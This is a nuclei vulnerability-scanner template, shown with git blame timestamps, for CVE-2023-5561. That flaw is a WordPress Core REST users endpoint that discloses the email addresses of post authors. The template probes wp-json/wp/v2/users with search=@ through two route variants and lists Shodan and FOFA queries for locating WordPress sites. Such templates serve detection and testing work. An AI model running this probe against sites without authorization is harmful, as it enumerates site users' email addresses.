nuclei-templates/http/cves/2023/CVE-2023-5561.yaml

67 lines
2.3 KiB
YAML
Raw Normal View History

2024-08-09 13:31:04 +00:00
id: CVE-2023-5561
info:
2024-10-18 06:34:27 +00:00
name: WordPress Core - Post Author Email Disclosure
2024-08-09 13:31:04 +00:00
author: nqdung2002
severity: medium
2024-10-18 06:34:27 +00:00
description: |
WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the 'list_users' capability, the search is applied to the user_email column.
impact: |
This can allow unauthenticated attackers to brute force or verify the email addresses of users with published posts or pages on the site.
2024-08-09 13:31:04 +00:00
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-470-631-sensitive-information-exposure-via-user-search-rest-endpoint?asset_slug=wordpress
- https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441/
2024-10-18 06:34:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-5561
2024-08-09 13:31:04 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
2024-10-18 06:34:27 +00:00
cve-id: CVE-2023-5561
2024-08-09 13:31:04 +00:00
cwe-id: CWE-200
2024-10-18 06:34:27 +00:00
epss-score: 0.00072
epss-percentile: 0.32109
cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
2024-08-09 13:31:04 +00:00
metadata:
verified: true
2024-10-18 06:34:27 +00:00
max-request: 2
vendor: wordpress
product: wordpress
framework: wordpress
shodan-query:
- cpe:"cpe:2.3:a:wordpress:wordpress"
- http.component:"wordpress"
fofa-query: body="oembed" && body="wp-"
tags: cve,cve2023,wpscan,disclosure,wp,wordpress,email,exposure
flow: http(1) && http(2)
2024-08-09 13:31:04 +00:00
http:
2024-10-18 06:34:27 +00:00
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins")'
internal: true
2024-08-09 13:31:04 +00:00
- method: GET
path:
- "{{BaseURL}}/{{route}}search=@"
2024-10-18 06:34:27 +00:00
2024-08-09 13:31:04 +00:00
stop-at-first-match: true
payloads:
route:
- "wp-json/wp/v2/users?"
- "?rest_route=/wp/v2/users&"
attack: clusterbomb
2024-10-18 11:39:05 +00:00
2024-08-09 13:31:04 +00:00
matchers:
- type: dsl
dsl:
- 'status_code == 200'
2024-10-18 06:34:27 +00:00
- 'contains(content_type, "application/json")'
- 'contains_all(body, "[{\"id", "name\":", "@")'
2024-10-21 03:01:05 +00:00
condition: and
# digest: 490a004630440220628e676e9da493d7e5323dfd1ff0a16ddee0a8507691358b486cc9a14729743102207edca00957368f29586561dc14f5081c99389e4635da39a7f27a5401076a1183:922c64590222798bb761d5b6d8e72950